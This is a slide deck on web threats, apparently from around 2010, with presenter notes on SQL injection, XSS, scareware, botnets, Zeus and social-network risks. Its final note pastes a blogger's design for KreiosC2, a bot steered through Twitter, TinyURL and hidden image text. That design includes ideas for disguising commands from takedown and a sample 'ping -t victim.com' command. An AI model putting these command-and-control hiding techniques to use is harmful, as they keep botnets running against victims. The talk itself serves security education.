• Explain why web-based attacks are today’s biggest threat
• Describe and demonstrate the three most common web attacks
• Learn how social networks are the more dangerous web sites of all
Web Threat Statistics
Malicious23%
Legitimate77%
Web Sites with Malcode
Malicious web sites increased by 111.4% between 2009/2010
The average website has 13 serious vulnerabilities
79.9% of web sites with malcode are hijacked legitimate sites.
52% - 60% of data-stealing happens over the web
76% of breaches target web apps
According to Websense, Jeremiah Grossman of Whitehat Security, Verizon & 7Scan
Web Application 76%
Infrastructure 14%
Presenter
Presentation Notes
Websense Threat Report 2010 (http://www.websense.com/content/threat-report-2010-introduction.aspx) Verizon 2010 Data Breach Investigation Report Source Jeremiah Grossman - Whitehat security source Websense Threat Report 2010: Found 111.4% increase in number of malicious sites between 2009 to 2010 Pretty much 80% (79.9) of sites with malicious code were hijacked legitimate sites Searching for breaking trends and news more dangerous than objectionable content. About 90% (89.9) of unwanted email contain links to spam sites or malware 52% of data stealing happens via the web. Our statistics show that 22.4 percent of real-time search results on entertainment will lead to a malicious link. What percentage of the top 100 most popular websites are categorized as Social Networking or search?65% of Top 100 and 95% of Top 20 40% of all Facebook status updates have links and 10% of those links are either spam or malicious. Verizon 2010 Data Breach Investigation Report: "The majority of breaches and almost all data stolen (98%) in 2009 is the work of criminals outside the victim organization. How do breaches occur... 48% privilege misuse... 40% hacking, 38% malware...hacking and malware accounts for 95% of data compromise The majority of breaches and almost all of the data stolen in 2009 (95%) were perpetrated by remote organized criminal groups hacking "servers and applications." That is, hacking Web Servers and Web applications — "websites" for short. The attack vector of choice was SQL Injection, typically a vulnerability that can’t readily be "patched," and used to install customized malware. Jeremiah Grossman - Whitehat security: The average website had nearly 13 serious vulnerabilities. Cross-Site Request Forgery moved up to 4th place With respect to the average number of serious vulnerabilities within large organizations, Social Networking, Banking, and Healthcare had the best marks with 4.38, 5.18, and 3.68 respectively. The three Worst were IT, Retail, Financial Services, with 29.55, 18.44, and 10.34
Malware Volume Out of Control
Credit: Panda Security
Presenter
Presentation Notes
Malware volume is out of control Packing, crypting, and other malware obfuscation techniques are creating 1000’s of new variants of the same threat. The growth of new malware variants is exponential
Why Attackers Moved to the Web
• Servers and OSs firewalled and hardened• Email Vector well protected• Users more savvy to email threats
We’ve Blocked Other Vectors of
Attack
• 3rd Party add-ons and plug-ins increase attack surface
• We do much more on the web.
Your Browser has become the
Universal App
• Complexity breeds insecurity• Its goal is to allow more user interaction and
content… that’s dangerous
Web 2.0 Presents a Juicy Target
Presenter
Presentation Notes
What’s ScarewareAlso called Fake AV or Rogueware, Scareware is a class of malware that pretends to be some legitimate software – usually security related software like AV – that tries to scare a victim into paying for a “registered” version of the software in order to fix a fiction computing or security problem. Some Scareware is benign, but others can include backdoor or trojan components.
Scareware Stats
• Scareware infections increase almost 47% between H1 and H2 ‘09 (continues to increase)
• FakeXPA was the 3rd most prevalent threat MS detected late ’09
• Experts believe Scareware is one of the payloads that makes attackers the most money
Combined Web Attacks Common
DBDB
Part 1: Automated SQL Injection AttackPart 2: Drive-by Download
SQL Injection: “An attack technique that allows hackers to gain control of a website’s underlying database due to flaws in the website’s application code.”
Currently the most common attack
Attackers can leverage SQL Injection attacks in countless ways
Often used to harvest sensitive data for identity theft
Millions of legitimate web sites hijacked with SQL injection attacks
Presenter
Presentation Notes
In order to provide the dynamic content I mentioned before, most modern websites also rely on a backend SQL database. For instance, when you login to a site that requires authentication, the web application communicates with a database to check your username and password, and uses that to decide what content you should see. [top bullet] Like before, with XSS, if a web designer doesn’t code this SQL interaction securely, an attacker can take advantage of flaws in his code to sneak unexpected SQL queries to your database server. This is called a SQL Injection. [second bullet] There are many evil things attackers can do with SQL injection. They can steal confidential and private date from your database, such as your customer’s credit card info, home address, SSN, etc… They can leverage logic tricks within SQL to bypass authentication mechanisms. They can even add, remove, or modify data in your database. For instance, Attackers could leverage SQL injections to change the prices of your products on your ecommerce site. [last bullet] Remember when I mentioned that millions of legitimate web sites were forced to serve malicious DbD code this year, in my earlier slides? Guess how that happened? Those sites were all hijacked via automated SQL Injections attacks. Attackers indiscreetly sent out millions of blind SQL Injection strings all over the Internet. Most of those SQL injection strings hit securely coded sites and failed. However, that doesn’t really bother the attacker… because for every 100 that failed,, one or two might have worked. And when it worked, a legitimate web site was forced to host the attackers malicious DbD, in the end earning the attacker more money.
Web Attacks: SQL Injection
Web Attacks: SQL Injection
Web Attacks: Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS): “In general, an attack technique that allows an attacker to run script on a victim’s computer under the context of a another website the victim trusts. This attack exploits the trust the user has for a particular site”
Steal cookies, hijack session, do anything user can
Provides social engineering opportunities for phishers
Often used in conjunction with DbD attacks
April 2010, the Apache Foundation was breached with XSS
Presenter
Presentation Notes
Today, we expect websites to deliver dynamic content personalized for us. To do this, websites have become web applications and have been designed so that we can interact with them in ways we never did before. In the past, websites only displayed information. Now they allow users to post information to them as well. Unfortunately, this new level of interaction between users and a websites has opened up a new class of security vulnerabilities… Web application attacks. [top bullet] One example of a web application attack is Cross-Site Scripting. If a web designer doesn’t program his web application to interact with users securely, he gives attackers the opportunity to inject scripts into his web code. Let me give you an example, say you run a classified sales web forum, similar to craigslist.com. You all allow users to post items for sale onto the forum. You also allow the forum posts to contain HTML code so that users can do things like add bold tags, or make text flash. This gives attackers the opportunity to add HTML scripts to forum post. An attacker could put up a fake “for sale” post, that contains malicious web script. When another user visits that hacker’s post to see what he has for sale, the user unknowingly runs the attacker’s script with the privileges of the classified sales web site. That means, the attacker gains access to anything that user has on that site. For instance, he could steal the web cookie your web browser uses to keep open an authenticated session. He could then use that cookie to login as you, and do lots of bad things. If the site stores your credit card info, the attacker can go on a shopping spree. [second bullet] For a long time, buffer overflows were the most commonly reported vulnerability, and one could argue was the most exploited vulnerability on the Internet. That’s no longer true. In 2008, Cross-site scripting flaws became the most commonly reported vulnerabililty. Jeremiah Grossman, from WhiteHat Security, claims XSS vulnerabilities can be found in 70 percent of websites. [last bullet] Cross-site Scripting allows you to do stuff on a victims computer with the same privileges of some other trusted website. That means attackers can exploit XSS flaws to read the cookies of other websites (among other things). So if a banking site suffers from a XSS flaw, a phisher can leverage that flaw to steal the cookie used for you web session to your banking site. In other words, they could log in o you banking site AS YOU, and do whatever they wanted. They’d only have to entice you to click on some specially-crafted link for their attack to succeed.
Cross-Site Scripting DEMO (1)
Botnets: Ultimate Blended Threat
Distributed Denial of Service (DDoS)
Spamming
Phishing
Click Fraud
ID Theft (on a massive scale)
Distributed password/hash cracking
Install additional malware
Backdoor access
Keylogging / spy on victim
Steal credentials
Proxy through victim
Leveraged in most attack campaigns
Botnets are the Swiss Army knife of the malware world, and bot-herders have many blades to
choose from.
Presenter
Presentation Notes
Trojans/bot clients Many AV and anti-malware firms report the vast majority of new malware are Trojans (typically, bot clients to add you to a botnet)
Botnets Still Evolving Quickly
Presenter
Presentation Notes
Trojans/bot clients Many AV and anti-malware firms report the vast majority of new malware are Trojans (typically, bot clients to add you to a botnet)
2010 Botnet Incidents:Zeus v3 (Zbot)
• Comes as a pre-packaged crimeware kit
• Heavily geared towards Online Banking attack
• Steals credentials from Banks and Social Networks
• Responsible for many different malware campaigns
• Some estimate it has infected 1 of every 100 computers
• Check out: https://zeustracker.abuse.ch
Presenter
Presentation Notes
Trojans/bot clients Many AV and anti-malware firms report the vast majority of new malware are Trojans (typically, bot clients to add you to a botnet)
Source: Network World March 2010
So What is Their Goal?
Plain and Simple it is Monetary Gain
Presenter
Presentation Notes
There is only one primary reason bad guys build botnets…. To make money…. In order to make this money, they must stay online and active … They do NOT want the press or authorities to notice their activities since it increases the chance someone will shut them down…
Social Networks:The #1 Web Threat
What is a Social Networking Site?
Presenter
Presentation Notes
A social network site is any place online where you can chat with other people, share information like pictures, stories, and videos, and even play games. Here are a few examples [click] of some popular social network sites. Do any of your have accounts on Facebook. Neat, so do I. How about Webkinz, that one is popular with my younger daughter. These are just a few examples of Social Network sites. There are literally, [click] thousands of these types of sites on the Internet, and they are easily the most popular sites both adults and kids visit online. However…. While social network sites are fun places to hang out, meet people, and even learn… They can also be dangerous because mean people can use them two. Lets talk about a few things you can do to keep yourself safe while you explore these sites.
SocNets are Hugely Popular
According to comScore, Inc.
0 100 200 300 400 500
Flickr
LinkedIn
Myspace
Twitter
Blogger
Windows Live
Facebook
SocNet Unique Visitors (In millions)
Presenter
Presentation Notes
According to Alexa.com, Five of the Top Ten most visited sites are Social Networking sites. Nielsen Online say: SocNets are now the 4th most popular online activity ahead of personal email. 67% of the global online population visit SocNets. Accounting for almost 10% of all internet time. 65% of Top 100 and 95% of Top 20 are social network sites (Jeremiah Grossman, Whitehat Security) 40% of all Facebook status updates have links and 10% of those links are either spam or malicious. (Jeremiah Grossman, Whitehat Security) Top SocNet Sites by Unique Worldwide visitors (according to ComScore): Blogger (222 million) Facebook (400 million Feb 2010) Linkedin now at 60 million MySpace (126 million) Twitter 75 million SocNet provide a humongous, ripe victim pool for attackers.
Two Types of SocNet Risks
SocialTechnical
Presenter
Presentation Notes
The risk posed by networks Social Networks is two fold.…. Social risks… and Technical Risks…
Technical: Web App Security NightmareWeb 2.0 problems
Allow user content
Allow offsite content
Tons of potential for XSS and XSRF attacks
Connections between SocNets
Presenter
Presentation Notes
The complexity of Web 2.0 technologies exposes a huge potential attack surface if coded poorly Allowing user content.. Content outside your control, is impossible to manage.. Same with allowing linking to external content These allowing of user or external content give attackers many avenues for XSS and XSRF social networks are starting to link credentials together, so change.gov knows your MySpace login
Social: A Culture of TrustPeople like to accept friends
No technical way to validate friends
People will click things friends send
People love to take quizzes and load apps
Presenter
Presentation Notes
40% of all Facebook status updates have links and 10% of those links are either spam or malicious. (Jeremiah Grossman, Whitehat Security) Social networks are built upon trust. If you don’t take special care to confirm, you must trust that someone befriending you is really who they say. Marcum Ranum (the CTO of Tenable Security) anecdote: Shawn Moyer and Nathian Hamiel’s experiment. Masquerade as Ranum on Linked in.. 50+ connections in 24hrs, and after joining several security networking communities to build in more credibility (CISO: Meaningful Metrics, ISACA, Executive Suite, Security, Security Leaders, and BlackHat), they got connection requests from the CSO of a security firm, from a former CSO of a Fortune 100 company, and then, from Ranum’s sister, who also fell for the ploy. CISSPs, feds, etc… Attackers will be drawn to this culture of trust like bees to honey, hoping to exploit it in their social engineering attacks. Pete Warden, a tech entrepreneur and former Apple engineer, culled a data set from Facebook's public profile pages. Warden had spent several months and tens of thousands of dollars crawling the public pages and collecting data on individuals—their location, fan pages, and a sampling of their friendships. FB threaten to sue, so he deleted, but illustrates huge privacy leak potential. On April 19th, Facebook removed its users' ability to control who can see their own interests and personal information (actually opt-in/opt-out change?). Certain parts of users' profiles, "including your current city, hometown, education and work, and likes and interests" will now be transformed into "connections," meaning that they will be shared publicly. If you don't want these parts of your profile to be made public, your only option is to delete them. This benefits FB and partners… doesn’t seem to benefit user. Three Democratic senators today asked the Federal Trade Commission to take a look at Facebook's controversial new information sharing policies, arguing that the massively popular social network overstepped its bounds when it began sharing user data with other websites. . Personal information like current city, hometown, education and work, likes and interests, sexual orientation will now become "connections", and as such, they will be made public. Users are not asked for permission, because the changes are "opt-out". Not for under 18. (called Open Graph API… connects sites, IMDB, Pandora, etc)
Apps Can Be Dangerous Social Networks let almost anyone make apps Some apps are (or can become) malware Bad guys target popular apps Last year, Farm Town got hacked
Presenter
Presentation Notes
The last thing we want to share about social network sites is their apps or games. Most social network sites have little online applications or games, which they often call apps. Have any of you ever done a fun quiz on Facebook? That is an app. How about playing a fun game on webkinz? That too is an app. These apps are usually great fun, but they can also be dangerous. For instance, [click] most social network sites allow any of their uses to create apps for other people to use or play. This is really a fun, neat idea that allows everyone to share their creativity with the world. The problem is that bad guys can also make apps that harm your computer, or try to steal information from you. In fact, [click] sometimes the apps and games on social networks have contained something called malware. Malware, is a bad computer program that usually tries to steal information from your computer. Often, the bad guys [click] know which are the most popular apps on a web site, and they specifically target those applications. For example, have any of your played Farm Town or FarmVille? Cool. [click] FarmVille and Farm Town are both VERY popular game apps that you can play on Facebook and some other social network sites. They allow you to manage your own farm and plant crops, and have your friends visit your farm. A few weeks ago, some bad guys figured out a way to get malware into Farm town. In the computer security world, we would say they hacked farm town. Basically, the bad guys snuck an evil program into the advertisements that show up when you play Farm Town. As you played the game, the evil program would make this [click] window pop up on your computer. It says your computer has something called a virus, and tells you that you need to pay money to buy a program to fix it. However, this is all fake. Your computer doesn’t really have a virus. The bad guys just wants your money. Now there really is no way for you to easily tell the bad apps or games from the good ones. And sometimes, bad guys can even sneak bad stuff into the good games anyways. So to protect yourself from this kind of thing, you should make sure your computer uses security software. When you go home tonight, you might want to ask you parents if they run security software on your computer. If they don’t, let them know there are free ones that work.
Actual SocNet AttacksHundreds of variants of Koobface
Tons of SocNet phishing (URL Shortening)
Twitter worms (StalkDaily and Mikeyy [sic])
SocNet spam increasing (with malware links)
Twitter DDoS and BotNet C&C (KreiosC2)
Attacks target popular apps(Farm Town)
$25 Malicious Facebook App kit (Tinie)
Like-jacking (due to OpenGraph API)
Presenter
Presentation Notes
Koobface is a SocNet worm. When someone is infected, it sends a social engineering message to all that victim’s SocNet friends. The message contains some hook and a web link to offsite content. If your friends visit that content, they get asked to install a more up to date version of flash, or a new video codec to see the content. If they allow the install, they get infected with Koobface. Very much like past email worms, just leveraging the SocNets. Facebook suffered many phishing attacks, like the “FBAction.net” attack. You might get a message asking you to login to Facebook, but it pointed to a fake Facebook site. If you login the attacker steals your credentials. StalkDaily and Mikeyy leverege XSS scripting flaws in the twitter site to hijack peoples twitter accounts and spam tweets as them. You would get infected if you visited a malicious or infected twitter profile. KreiosC2 is a proof of concept bot which uses various unusual systems as its Command and Control channel. Obviously this can be used for malicious purposes but also for good ones, for example you can set up a bot at home to listen to your Twitter feed and perform actions on it. I'll discuss the potentially malicious use of it here but it would be easy to take the concepts and use them for good. They say a picture is worth a thousand words so a video must be worth more, here are two videos demoonstrating KreiosC2, the first video of KreiosC2 in action put together by Tom Eston for his Defcon talk, Social Zombies - Your friends want your brains, and the second created by me for the sequal, Social Zombies II, Your friends need more brains. Whats new in version 3? Version 3 was released at Shmoocon 2010 as part of the "Social Zombies II, Your friends need more brains" talk given by Tom Eston, Kevin Johnson and myself. It adds support for channelling through LinkedIn and has been tested under Windows. As soon as the videos are posted I'll add a link. Whats new in version 2? In this release I've separated the code which downloads the messages from the main body of the application in the same way as the languages are self contained files. This allowed me to add new command channels as well as the original Twitter. With this version you can now pass messages encoded in TinyURL shortened URLs and through text hidden in JPEGs. Also, with the way the system is built, it is a simple process to add a new type of channel and roll it out to a live system. I've called these new channel types protocols and you can read more about them in the How it all works section. Whats new since version 1? First the name change. Version 1 of this project was called TwitterBot. Unfortunately, I didn't do any research before using the name and only after I launched it I realised that there were already a lot of other projects out there with the same name. The name KreiosC2 was created by Tom and is made up from Kreios, a Greek Titan God, and C2 which is the name the military uses to define command and control. Second, and really more importantly, KreiosC2 now has the ability to dynamically update the control language used and add new features on the fly without any restarts or any manual intervention. Background The reason I was thinking about Twitter is it has such a large community that it would be easy to hide random commands in the large amount of data that is generated each day. It also has a really good API that would make integration easy. My first idea was to have a protected twitter account which only the bots could read. This would restrict who could see the commands but it would be easy for Twitter to block that user. My next thought was to send the commands to random accounts and then have the bot use the search feature to find the commands. This would mean that it would be harder for Twitter to block the messages as the commands could be posted from any account to any other account. For this to work the bot would have to have a way to spot the commands in the general mess of other tweets out there. The problem with this is that if the bot can spot the commands then Twitter could also do the same matching and automatically drop those tweets. This is a harder one to defend against. My plan to defeat this would be to use seemingly innocent commands, such as "check out this link ..." to say download a file, which would be hard for Twitter to block without upsetting legitimate users but I don't know how hard it would be to create a command language based on this. I proposed these ideas to Tom Eston (from the Security Justice Podcast), who is currently doing work on social media botnets, and to Mubix (who everyone knows). Tom suggested using TinyURL to obfuscate commands or to use hash tags to represent certain things. You could also get the bots to follow certain accounts to mark themselves as bots. If they followed a specific bot master account then they would be easy to spot but having them follow a general account, the BBC say, again they could be lost in the masses unless you knew where to look. Tom is giving a talk at Notacon where he will be talking a bit more about this and other social media bots. Mubix added the following ideas: Use a time based code that is based on the time of the twitter update so, bots check via the public time line what the current time is, and based on the hour they are checking within ( 7AM, 2PM etc) they have a specific minute to look for a command within (i.e. at 7 PM they are looking for a command at 7:13). This command would be a cipher text posted by one of over a hundred dummy twitter accounts, and no matter how many accounts Twitter got rid of, you could always make more Again going with the key. You could simply use Unix time as part of the post. So, bot checks twitter time based on public stream, converts to Unix time, does a search on twitter for the current Unix time and looks for the second part of the key would be an easy cipher. Once they found the key, it would be: "1239197528 How do I convert this to normal date time?" - And then the bot would take the first letter of each of the words: HDICTTNDT and look up that user then take it's latest post and issue the command in the post. "ping -t victim.com" Some interesting ideas on the packet structure have been suggested by Tcrweb at his blog. I'd personally expand the command byte to at least two bytes to allow for expansion but apart from that I like the ideas. Conclusion Hopefully this gives you an idea of the potential for using channels other than IRC to control a bot or botnet. Versions 1 and 2 both suffer from the problem that once someone reverse engineers a bot and works out the command syntax it would probably be possible for Twitter to shut the system down fairly well, however, as version 3 now allows you to switch channels it makes the job of shutting down the network much harder, and if the reverse engineering job was made hard enough and the methods of hiding the commands made either very generic or just maybe a really large amount of them, maybe 50 different ways to say execute a command, then it would take admins a while to workout the fix and implement it which may just give the bad guys the edge they need. I was in two minds about releasing this idea, partly because I thought it was a bit mad as Twitter could shut this kind of thing down a lot easier than, say, the DNS registrars could stop the registering of the domain names Confiker uses to control its bots, and partly because if it did work and someone does use this for badness then it is quite scary that I may have triggered it. But after talking to Mubix and Tom we decided that disclosure is better than keeping things boxed up so I've put it out. Please give me any feedback as I'm interested to know what others think.
